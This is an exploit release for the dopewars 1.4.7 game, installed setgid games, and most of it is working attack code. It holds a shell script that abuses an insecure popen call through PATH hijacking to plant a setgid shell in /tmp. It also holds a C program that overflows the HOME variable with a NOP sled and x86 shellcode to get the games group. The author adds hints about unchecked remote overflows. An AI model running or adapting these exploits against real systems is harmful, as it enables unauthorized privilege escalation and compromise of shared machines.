two security holes i found for local use in dopewars(1.4.7-current). 2dopewars_exploits.txt
two security holes i found for local use in dopewars(1.4.7-current). dopewars
is setgid=games. by: Vade79->v9[
LOCAL VULNERABILITY #1: insecure popen call, a shell script can handle this.
-- dopewars.sh start --
#!/bin/sh
# dopewars.sh(1.4.7): shell script by Vade79->
# insecure use of a popen call while setgid isn't good in any situation.
DOPEWARS=`which dopewars`
if [ "$DOPEWARS" ];
then echo "[*] dopewars binary found: $DOPEWARS."
else echo "[!] dopewars binary was not found, aborted.";exit
fi
CHECK=`ls -l $DOPEWARS | grep sr-`
if [ "$CHECK" ];
then echo "[*] dopewars found to be setgid, proceeding."
else echo "[!] dopewars NOT found to be setgid, aborted.";exit
fi
PATH=/tmp:$PATH
cp /bin/sh /tmp/gidsh
echo 'main(){system("chgrp games /tmp/gidsh;chmod 2755 /tmp/gidsh");}'>/tmp/more.c
cc /tmp/more.c -o /tmp/more
cat <<X>/tmp/dopecmds
help
quit
X
dopewars -s</tmp/dopecmds 1>/dev/null 2>&1
rm -f /tmp/more* /tmp/dopecmds
CHECK=`ls -l /tmp/gidsh | grep sr-`
if [ "$CHECK" ];
then echo "[*] success, setgid shell is in: /tmp/gidsh."
else echo "[!] failed, the setgid shell doesn't exist."
fi
-- dopewars.sh end --
LOCAL VULNERABILITY #2: $HOME buffer overflow in versions 1.4.3-7(current).
-- dopewars_bof.c start --
/* (linux)dopewars[v1.4.3+] local buffer overflow, by v9[
dopewars is SGID(=2755)=games by install(make install). this overflow is
true for versions of dopewars 1.4.3 to 1.4.7(current).
syntax: ./dopewars_bof [offset] [alignment(0-3)]
./dopewars_bof -200 1
the basic overlow(dopewars.c):
--
pt=getenv("HOME");
if (!pt) return;
if (strlen(pt) > 770) {
sprintf(ConfigFile,"Home directory %s too long.",pt);
ReportError(ConfigFile);
return;
}
sprintf(ConfigFile,"%s/.dopewars",pt);
--
"the home directory is too long! so what? lets contiune anyways."
note: even in the current version of dopewars(1.4.7) there appear to be some
remote overflow possibilities from server->client(bof the client with
a bogus server). you can even overflow the server just by simply
sending a large string(eip=0x0..). i am just making a note of lots of
unchecked buffers. also, $HOME is too common a overflow for this to
occur. :) */
#define PATH "/usr/local/bin/dopewars" // path to the dopewars program.
#define GID 20 // group id of games.
#define DEFAULT_OFFSET 200 // if no argument #1.
#define DEFAULT_ALIGN 1 // if no argument #2.
static char exec[]=
"\xeb\x29\x5e\x31\xc0\xb0\x2e\x31\xdb\xb3"
"\x00" // soon to be gid=games.
"\xcd\x80\x89\x76\x08\x31\xc0\x88\x46\x07"
"\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08"
"\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40"
"\xcd\x80\xe8\xd2\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x01"; // my usual shellcode for these situations :)
long esp(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
char bof[800];
int i,offset,align;
long ret;
if(argc>1){offset=atoi(argv[1]);}
else{offset=DEFAULT_OFFSET;}
if(argc>2){
if(atoi(argv[2])>3||atoi(argv[2])<0){printf("%s: %s is an invalid alignment, use 0-3.\n",argv[0],argv[2]);exit(-1);}
else{align=atoi(argv[2]);}
}
else{align=DEFAULT_ALIGN;}
ret=(esp()-offset);
printf("[ return addr: 0x%lx, offset: %d, alignment: %d. ]\n",ret,offset,align);
exec[10]=GID;
for(i=align;i<800;i+=4){*(long *)&bof[i]=ret;}
for(i=0;i<(800-strlen(exec)-50);i++){*(bof+i)=0x90;}
memcpy(bof+i,exec,strlen(exec));
setenv("HOME",bof,1);
if(execlp(PATH,"dopewars",0)){
printf("%s: defined path %s did not execute correctly.\n",argv[0],PATH);
exit(-1);
}
}
-- dopewars_bof.c end --
Vade79 ->